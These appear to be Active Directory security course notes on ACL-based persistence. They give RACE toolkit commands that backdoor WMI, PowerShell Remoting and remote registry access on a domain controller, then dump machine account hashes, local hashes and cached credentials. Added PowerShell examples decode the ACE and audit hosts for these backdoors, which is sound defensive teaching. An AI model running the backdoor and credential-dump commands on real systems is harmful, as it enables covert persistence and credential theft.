• It is possible to modify the Security Descriptors (Owner, primary group, DACL, SACL) of several remote access methods (securable objects such as WMI namespaces, PowerShell Remoting session configurations and registry keys) so that a chosen non-admin user is granted access to them

  • A very effective backdoor mechanism: the granted access does not depend on group membership and persists until someone audits and reverts the ACL

  • Security Descriptor Definition Language (SDDL) defines the string format used to describe a security descriptor. SDDL uses ACE strings for the DACL and SACL, each enclosed in parentheses: ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid

  • ACE for built-in administrators on WMI namespaces: A;CI;CCDCLCSWRPWPRCWD;;;SID (allow ACE, container-inherit so child namespaces inherit it, rights mask 0x6003F which is full control on the namespace, granted to the trustee SID). The backdoor appends the same ACE with the chosen user's SID

  • ACLs can be modified to allow non-admin users access to securable objects. Using the RACE toolkit (dot-source it first): C:\AD\Tools\RACE-master\RACE.ps1
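
To see what the ACE string above actually grants, the following added example (written for these notes, not part of the course material or any toolkit) decodes an SDDL ACE string into its fields and maps the rights mask onto the WMI namespace permissions shown in the WMI Control snap-in. It runs offline on Windows PowerShell 5.1 or PowerShell 7 on Windows; the trustee SID and the helper name ConvertFrom-WmiAceString are this example's own.

```powershell
# Added example, not part of the course notes or any toolkit: decode an SDDL ACE
# string of the form ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid
# and show which WMI namespace permissions its rights field grants. Runs offline on
# Windows PowerShell 5.1 or PowerShell 7 on Windows; the trustee SID is a made-up value.

# WMI namespace access-mask bits (the names used by the WMI Control MMC snap-in).
# The SDDL two-letter rights codes resolve to the same bit values, which is why the
# generic-looking string CCDCLCSWRPWPRCWD means "full control" on a namespace.
$WmiRights = @{
    0x00001 = 'Enable Account (CC)'
    0x00002 = 'Execute Methods (DC)'
    0x00004 = 'Full Write (LC)'
    0x00008 = 'Partial Write (SW)'
    0x00010 = 'Provider Write (RP)'
    0x00020 = 'Remote Enable (WP)'
    0x20000 = 'Read Security (RC)'
    0x40000 = 'Edit Security (WD)'
}

function ConvertFrom-WmiAceString {
    param([Parameter(Mandatory)][string]$AceString)

    # Wrap the bare ACE in a minimal descriptor string ("D:" = DACL) so the .NET SDDL
    # parser does the field splitting and the rights-code-to-mask conversion for us.
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor "D:($AceString)"

    foreach ($ace in $sd.DiscretionaryAcl) {
        $mask = $ace.AccessMask
        [pscustomobject]@{
            Type    = $ace.AceType                 # 'A'  -> AccessAllowed
            Flags   = $ace.AceFlags                # 'CI' -> ContainerInherit (child namespaces inherit it)
            Trustee = $ace.SecurityIdentifier.Value
            Mask    = '0x{0:X5}' -f $mask          # CCDCLCSWRPWPRCWD -> 0x6003F
            Rights  = @($WmiRights.Keys | Sort-Object | Where-Object { $mask -band $_ } |
                        ForEach-Object { $WmiRights[$_] })
        }
    }
}

# Constructed input: the ACE the WMI backdoor appends, granted to a made-up domain user SID.
$backdoorAce = 'A;CI;CCDCLCSWRPWPRCWD;;;S-1-5-21-1111111111-2222222222-3333333333-1105'
ConvertFrom-WmiAceString -AceString $backdoorAce | Format-List

# For comparison, an ACE like the one Authenticated Users normally hold: enable account,
# execute methods and provider write only (mask 0x13), with no Remote Enable bit.
ConvertFrom-WmiAceString -AceString 'A;CI;CCDCRP;;;S-1-5-11' | Format-List
```

The comparison is the point: a trustee with only the 0x13 rights cannot connect to the namespace over the network at all, while the backdoor ACE adds Remote Enable plus Read/Edit Security, so the backdoored user can both use the namespace remotely and change its DACL again later.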

Using WMI

# On the local machine: grant username access (default namespace root, inherited by child namespaces)
Set-RemoteWMI -SamAccountName username -Verbose
# On a remote machine, with the privileges of the current user, for the root\cimv2 namespace
Set-RemoteWMI -SamAccountName username -ComputerName domain-controller -namespace 'root\cimv2' -Verbose
# Same, with explicit credentials
Set-RemoteWMI -SamAccountName username -ComputerName domain-controller -Credential Administrator -namespace 'root\cimv2' -Verbose
# Remove the backdoor ACE again
Set-RemoteWMI -SamAccountName username -ComputerName domain-controller -namespace 'root\cimv2' -Remove -Verbose

Using RACE toolkit

PS Remoting backdoor
# On the local machine: allow username to use PowerShell Remoting
Set-RemotePSRemoting -SamAccountName username -Verbose
# On a remote machine
Set-RemotePSRemoting -SamAccountName username -ComputerName domain-controller -Verbose
# Remove the backdoor again
Set-RemotePSRemoting -SamAccountName username -ComputerName domain-controller -Remove

Remote Registry
# Grant username (the trustee) remote registry access to the keys needed for credential retrieval
Add-RemoteRegBackdoor -Computername domain-controller -Trustee username -Verbose
# As the backdoored user, retrieve secrets over the remote registry without admin rights
Get-RemoteMachineAccountHash -ComputerName domain-controller -Verbose
Get-RemoteLocalAccountHash -ComputerName domain-controller -Verbose
Get-RemoteCachedCredential -ComputerName domain-controller -Verbose
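
All three backdoors leave the same trace: an allow ACE for a specific account or group SID (S-1-5-21-...) on an object whose default DACL only references well-known SIDs. The following added example (written for these notes, not part of the course material or the RACE toolkit) audits the local host for that trace on the WMI namespace, every PowerShell session configuration, and the registry keys the remote registry backdoor depends on. It assumes Windows PowerShell 5.1 run elevated; the function names, the registry key list and the empty allow-list are this example's own choices.

```powershell
#Requires -RunAsAdministrator
# Added example, not part of the course notes or the RACE toolkit: audit the local host
# for the three persistence methods above by reading the DACL of the WMI namespace, of
# each PowerShell session configuration and of the registry keys the remote-registry
# backdoor relies on, and reporting every allow ACE whose trustee is an account or group
# SID (S-1-5-21-...). Assumptions: Windows PowerShell 5.1, run elevated; the key list and
# the empty allow-list are this example's own choices.

# Known-good account/group SIDs for your environment (none by default).
$AllowedSids = @()

function Find-UnexpectedTrustee {
    param(
        [Parameter(Mandatory)][string]$Object,
        [Parameter(Mandatory)][System.Security.AccessControl.RawSecurityDescriptor]$Descriptor
    )
    foreach ($ace in $Descriptor.DiscretionaryAcl) {
        if ($ace.AceType -ne [System.Security.AccessControl.AceType]::AccessAllowed) { continue }
        $sid = $ace.SecurityIdentifier.Value
        # Default DACLs on these objects hold only well-known SIDs; a domain or local
        # account/group SID with an explicit allow ACE is what the backdoors add.
        if ($sid -notlike 'S-1-5-21-*' -or $AllowedSids -contains $sid) { continue }
        [pscustomobject]@{
            Object  = $Object
            Trustee = $sid
            Account = $(try { ([System.Security.Principal.SecurityIdentifier]$sid).Translate(
                                [System.Security.Principal.NTAccount]).Value } catch { '<unresolved>' })
            Mask    = '0x{0:X}' -f $ace.AccessMask
            Flags   = $ace.AceFlags
        }
    }
}

function Invoke-BackdoorAclAudit {
    param(
        [string]$Namespace = 'root\cimv2',
        # Keys a remote-registry credential dump needs: the SAM and SECURITY hives, the key
        # that controls remote registry access, and the Lsa subkeys whose class names
        # form the boot key used to decrypt the hashes.
        [string[]]$RegistryKeys = @(
            'HKLM:\SAM', 'HKLM:\SECURITY',
            'HKLM:\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg',
            'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\JD',
            'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\Skew1',
            'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\GBG',
            'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\Data')
    )

    # 1. WMI namespace: __SystemSecurity.GetSD returns the descriptor in binary form.
    try {
        $sec   = Get-WmiObject -Namespace $Namespace -Class __SystemSecurity -ErrorAction Stop
        $binSd = @($null)
        $null  = $sec.PsBase.InvokeMethod('GetSD', $binSd)
        $sd    = [System.Security.AccessControl.RawSecurityDescriptor]::new([byte[]]$binSd[0], 0)
        Find-UnexpectedTrustee -Object "WMI $Namespace" -Descriptor $sd
    } catch { Write-Warning "WMI namespace ${Namespace}: $_" }

    # 2. PowerShell Remoting: each session configuration carries its own SDDL.
    try {
        foreach ($cfg in Get-PSSessionConfiguration -ErrorAction Stop) {
            if (-not $cfg.SecurityDescriptorSddl) { continue }
            $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor $cfg.SecurityDescriptorSddl
            Find-UnexpectedTrustee -Object "PSSession $($cfg.Name)" -Descriptor $sd
        }
    } catch { Write-Warning "PSSessionConfiguration (is WinRM running?): $_" }

    # 3. Remote registry: the DACL on the keys themselves.
    foreach ($key in $RegistryKeys) {
        try {
            $sddl = (Get-Acl -Path $key -ErrorAction Stop).Sddl
            $sd   = New-Object System.Security.AccessControl.RawSecurityDescriptor $sddl
            Find-UnexpectedTrustee -Object "Registry $key" -Descriptor $sd
        } catch { Write-Warning "Registry ${key}: $_" }
    }
}

$findings = @(Invoke-BackdoorAclAudit)
if ($findings.Count -eq 0) {
    'No account or group SIDs hold explicit allow ACEs on the audited objects.'
} else {
    $findings | Format-Table -AutoSize
}
```

Run it on a domain controller before and after Set-RemoteWMI, Set-RemotePSRemoting or Add-RemoteRegBackdoor and the added trustee shows up against the object it was granted on. The SID filter is a heuristic: if your build legitimately grants a domain group access to one of these objects, put its SID in $AllowedSids rather than widening the filter.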